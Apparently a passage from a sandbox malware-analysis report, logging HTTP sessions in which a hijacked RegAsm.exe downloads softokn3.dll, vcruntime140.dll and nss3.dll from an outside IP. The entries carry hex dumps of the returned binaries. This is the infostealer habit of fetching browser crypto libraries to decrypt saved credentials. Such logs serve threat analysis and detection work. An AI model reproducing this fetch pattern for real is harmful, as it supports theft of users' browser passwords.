                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          35192.168.2.65855249.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:42 UTC196OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:43 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:43 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 257872
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Last-Modified: Wednesday, 02-Oct-2024 12:43:43 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          2024-10-02 12:43:43 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                                                                                          2024-10-02 12:43:43 UTC16384INData Raw: 7d 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00
                                                                                                                                                                                                                                          Data Ascii: }jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                                                                                                                                                                          2024-10-02 12:43:43 UTC16384INData Raw: 8b 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50
                                                                                                                                                                                                                                          Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
                                                                                                                                                                                                                                          2024-10-02 12:43:43 UTC16384INData Raw: f9 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f
                                                                                                                                                                                                                                          Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                                                                                                                                                                          2024-10-02 12:43:43 UTC16384INData Raw: 85 c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84
                                                                                                                                                                                                                                          Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!
                                                                                                                                                                                                                                          2024-10-02 12:43:43 UTC16384INData Raw: 5e 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01
                                                                                                                                                                                                                                          Data Ascii: ^_[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
                                                                                                                                                                                                                                          2024-10-02 12:43:43 UTC16384INData Raw: 74 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00
                                                                                                                                                                                                                                          Data Ascii: twu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                                                                                                                                                                          2024-10-02 12:43:43 UTC16384INData Raw: 8b 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84
                                                                                                                                                                                                                                          Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                                                                                                                                                          2024-10-02 12:43:43 UTC16384INData Raw: 00 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff
                                                                                                                                                                                                                                          Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                                                                                                                                                                          2024-10-02 12:43:43 UTC16384INData Raw: eb e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb
                                                                                                                                                                                                                                          Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          36192.168.2.65855349.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:44 UTC200OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:45 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:44 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 80880
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Last-Modified: Wednesday, 02-Oct-2024 12:43:44 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          2024-10-02 12:43:45 UTC16122INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                                                                                          2024-10-02 12:43:45 UTC16384INData Raw: 02 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46
                                                                                                                                                                                                                                          Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
                                                                                                                                                                                                                                          2024-10-02 12:43:45 UTC16384INData Raw: 00 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8
                                                                                                                                                                                                                                          Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
                                                                                                                                                                                                                                          2024-10-02 12:43:45 UTC16384INData Raw: 8b d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d
                                                                                                                                                                                                                                          Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                                                                                                                                                                          2024-10-02 12:43:45 UTC15606INData Raw: 4e 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72
                                                                                                                                                                                                                                          Data Ascii: NT@L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicr


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          37192.168.2.65855449.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:46 UTC192OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:46 UTC264INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:46 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 2046288
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Last-Modified: Wednesday, 02-Oct-2024 12:43:46 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          2024-10-02 12:43:46 UTC16120INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                                                                                          2024-10-02 12:43:46 UTC16384INData Raw: ee 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41
                                                                                                                                                                                                                                          Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MA
                                                                                                                                                                                                                                          2024-10-02 12:43:46 UTC16384INData Raw: 68 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b
                                                                                                                                                                                                                                          Data Ascii: hRQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$
